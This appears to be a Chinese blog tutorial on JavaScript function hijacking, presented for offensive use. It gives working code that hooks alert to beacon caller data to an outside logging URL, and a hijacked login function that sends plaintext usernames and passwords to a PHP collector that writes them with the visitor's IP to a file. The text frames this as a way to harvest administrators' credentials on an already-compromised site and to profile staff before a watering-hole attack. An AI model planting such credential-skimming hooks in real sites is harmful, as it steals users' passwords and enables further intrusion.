JavaScript 函数劫持攻击原理

JavaScript 函数劫持并不是什么新颖的技术了。这两天在和同事吹牛的过程中提到了这个，就简单地再回顾回顾，以及假想在攻防的运用场景。

一个简单的示例如下，主要逻辑就是，用变量 _alert保存原函数 alert，然后重写 alert 函数，在重写的函数最后调用原函数。这样得到的一个效果就是调用 alert 的时候，可以往 alert 中加入其它操作。比如如下代码中进行一个赋值。

 
  var _alert = alert;   alert = function(){ 
    var str = "啥也不是";     _alert(str); 
  }   alert(); 
 

这种编程技巧常用于开发中的日志收集与格式化。既然可以劫持函数加入自己的操作，那么就可以在比较隐蔽的执行一些猥琐的操作。比如：

https://wiki.jikexueyuan.com/project/brief-talk-js/function-hijacking.html

一文中提到的通过 Hook alert 函数来记录调用情况，或者弹一些警告信息，这样就可以记录到测试者的网络出口ip、浏览器指纹等信息也加上，没准就是日后的呈堂证供。

   
  function log(s) {     var img = new Image();   
  imgimg.style.width = img.style.height = 0;     img.src = "http://yousite.com/log.php?caller=" + encodeURIComponent(s);   
  }     var _alert = alert;   
  window.alert = function(s) {     log(alert.caller);   
  _alert(s);     }   
   

在某些场景下，比如：已有权限，但是数据库中密码是加密的，无法解开。又或者需要探测目标人员访问此网站的规律。此时就可以利用劫持登录函数来记录明文的账号密码。如下示例：

onclick 事件会调用 login 函数发送请求包：

     
            
             
 
            submit
          
         

可以劫持 login 函数，在发送登陆请求前，先发到探针文件中做一些记录帐号密码等操作。

var _login=login; 
login = function (){     var username = document.getElementById("username").value; 
    var password = document.getElementById("password").value;     $.ajax({ 
        url:"log.php",         type:"POST", 
        data:{             "username":username, 
            "password":password         }, 
        success:console.log("1"),         error:function(){ 
            alert("error");         } 
    });      
} 

log.php 的内容如下：

$username = $_POST["username"]; $password = $_POST["password"]; 
$ip = $_SERVER['REMOTE_ADDR']; file_put_contents("./log.txt",$username." ".$password." ".$ip); 

也许在实际中更常见的表单形式应该是下面这种。

这种表单也可以通过小小的改动，很简单的记录到信息,下面使用的是 onsubmit 事件，用如下方式即可：

不仅可以记录密码，还可以结合前面提到的记录日志，来记录管理员的登录时间、IP、UA 和浏览器指纹等信息。这种探针常用于布置水坑攻击前针对人员登录情况的信息收集，根据收集的信息制定具体的水坑方案。